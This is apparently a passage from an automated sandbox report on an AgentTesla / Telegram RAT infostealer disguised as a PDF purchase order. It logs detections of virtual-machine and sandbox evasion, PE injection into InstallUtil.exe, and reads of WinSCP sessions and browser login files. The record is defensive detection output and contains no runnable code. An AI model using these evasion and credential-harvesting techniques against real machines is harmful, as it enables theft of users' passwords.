                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: RFQ__PO_PO 24090041-PDF____PDF.exe PID: 6204, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Afoagcjtqvi.exe PID: 6192, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Afoagcjtqvi.exe PID: 824, type: MEMORYSTR
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1753923605.0000000002C17000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1887638572.0000000003138000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000007.00000002.1968221144.0000000002CB8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeMemory allocated: 1180000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeMemory allocated: 2BD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeMemory allocated: 29E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2390000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2580000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 23B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeMemory allocated: 2EC0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeMemory allocated: 30F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeMemory allocated: 50F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 740000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2540000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 23A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeMemory allocated: 2A40000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeMemory allocated: 2C70000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeMemory allocated: 4C70000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2670000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 27B0000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 47B0000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: InstallUtil.exe, 00000001.00000002.1886447454.00000000006FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQ
                      Source: InstallUtil.exe, 00000008.00000002.2986413630.0000000005D80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
                      Source: Afoagcjtqvi.exe, 00000007.00000002.1963893230.0000000000FA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
                      Source: Afoagcjtqvi.exe, 00000007.00000002.1968221144.0000000002CB8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                      Source: Afoagcjtqvi.exe, 00000002.00000002.1885629638.0000000001392000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllH
                      Source: Afoagcjtqvi.exe, 00000007.00000002.1968221144.0000000002CB8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1753113997.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.1984248653.00000000057E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 600000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 180000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 600000Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 602000Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 63C000Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 63E000Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 40C008Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 180000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 182000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 1BC000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 1BE000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 3F4008Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 649008
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeQueries volume information: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeQueries volume information: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeQueries volume information: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3eb1aa0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3eb1aa0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Afoagcjtqvi.exe.4256f68.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.InstallUtil.exe.600000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Afoagcjtqvi.exe.4256f68.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3bd9550.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3d35080.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3ce6860.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.2973425919.00000000027FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1912263833.0000000004242000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1970737045.000000000258E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1890943123.00000000025E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2973425919.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1887638572.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1912263833.00000000042F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1890943123.00000000025CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1753923605.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1886274961.0000000000602000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1970737045.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2973425919.000000000281A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1762985351.0000000003CE6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1970737045.000000000254C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1968221144.0000000002CB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1995281539.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1890943123.0000000002581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1762985351.0000000003BD8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RFQ__PO_PO 24090041-PDF____PDF.exe PID: 6204, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 4008, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Afoagcjtqvi.exe PID: 6192, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 344, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Afoagcjtqvi.exe PID: 824, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7012, type: MEMORYSTR
                      Yara detected Telegram RAT
                      Source: Yara matchFile source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3eb1aa0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3eb1aa0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Afoagcjtqvi.exe.4256f68.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.InstallUtil.exe.600000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Afoagcjtqvi.exe.4256f68.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3bd9550.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3d35080.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3ce6860.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.1912263833.0000000004242000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1887638572.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1912263833.00000000042F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2973425919.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1753923605.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1886274961.0000000000602000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1762985351.0000000003CE6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1970737045.000000000254C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1968221144.0000000002CB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1995281539.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1890943123.0000000002581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1762985351.0000000003BD8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RFQ__PO_PO 24090041-PDF____PDF.exe PID: 6204, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 4008, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Afoagcjtqvi.exe PID: 6192, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 344, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Afoagcjtqvi.exe PID: 824, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7012, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
